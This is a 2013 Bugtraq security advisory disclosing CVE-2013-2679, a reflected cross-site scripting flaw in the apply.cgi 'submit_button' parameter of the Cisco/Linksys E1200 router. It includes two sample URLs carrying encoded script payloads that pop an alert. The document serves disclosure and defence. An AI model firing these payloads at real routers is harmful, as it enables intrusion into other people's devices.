看板 Bugtraq 關於我們 聯絡資訊
Mitre has assigned the following CVE for this issue: CVE-2013-2679 On Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict <theinfinitenigma@gmail.com> wrote: > Summary > -------------------- > Software : Cisco/Linksys Router OS > Hardware : E1200 N300 (others currently untested) > Version : 2.0.04 (others currently untested) > Website : http://www.linksys.com > Issue : Reflected XSS > Severity : Medium > Researcher: Carl Benedict (theinfinitenigma) > > Product Description > -------------------- > The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access = point, and 10/100 switch. > > Details > -------------------- > The apply.cgi page, which backs all HTML forms on the device, is vulnerab= le to reflected XSS via the 'submit_button' parameter. The vulnerability is= caused due to a lack of input validation and poor/missing server side vali= dation checks. This attack requires an authenticated session. This applicat= ion uses HTTP basic authentication. Because of this, there is no session, w= hich increases the likelihood of this attack being successful. > > Sample URL #1 (HTTP GET request): > > http://192.168.1.1/apply.cgi?submit_button=3D%27%3b%20%3C%2fscript%3E%3Cs= cript%3Ealert%281%29%3C%2fscript%3E%20%27 > > Sample URL #2 (HTTP GET request): > > http://192.168.1.1/apply.cgi?submit_button=3Dindex%27%3b%20%3c%2f%73%63%7= 2%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%7= 2%69%70%74%3e%20%27&change_action=3D&submit_type=3D&action=3DApply&now_prot= o=3Ddhcp&daylight_time=3D1&switch_mode=3D0&hnap_devicename=3DCisco10002&nee= d_reboot=3D0&user_language=3D&wait_time=3D0&dhcp_start=3D100&dhcp_start_con= flict=3D0&lan_ipaddr=3D4&ppp_demand_pppoe=3D9&ppp_demand_pptp=3D9&ppp_deman= d_l2tp=3D9&ppp_demand_hb=3D9&wan_ipv6_proto=3Ddhcp-tunnel&detect_lang=3DEN&= wan_proto=3Ddhcp&wan_hostname=3D&wan_domain=3D&mtu_enable=3D0&lan_ipaddr_0= =3D192&lan_ipaddr_1=3D168&lan_ipaddr_2=3D1&lan_ipaddr_3=3D1&lan_netmask=3D2= 55.255.255.0&machine_name=3DCisco10002&lan_proto=3Ddhcp&dhcp_check=3D&dhcp_= start_tmp=3D100&dhcp_num=3D50&dhcp_lease=3D0&wan_dns=3D4&wan_dns0_0=3D0&wan= _dns0_1=3D0&wan_dns0_2=3D0&wan_dns0_3=3D0&wan_dns1_0=3D0&wan_dns1_1=3D0&wan= _dns1_2=3D0&wan_dns1_3=3D0&wan_dns2_0=3D0&wan_dns2_1=3D0&wan_dns2_2=3D0&wan= _dns2_3=3D0&wan_wins=3D4&wan_wins_0=3D0&wan_wins_1=3D0&wan_wins_2=3D0&wan_w= ins_3=3D0&time_zone=3D-08+1+1&_daylight_time=3D1 > > History > -------------------- > 04/26/2013 : Discovery > 04/27/2013 : Advisory released > > > -- > =E2=88=9E --=20 =E2=88=9E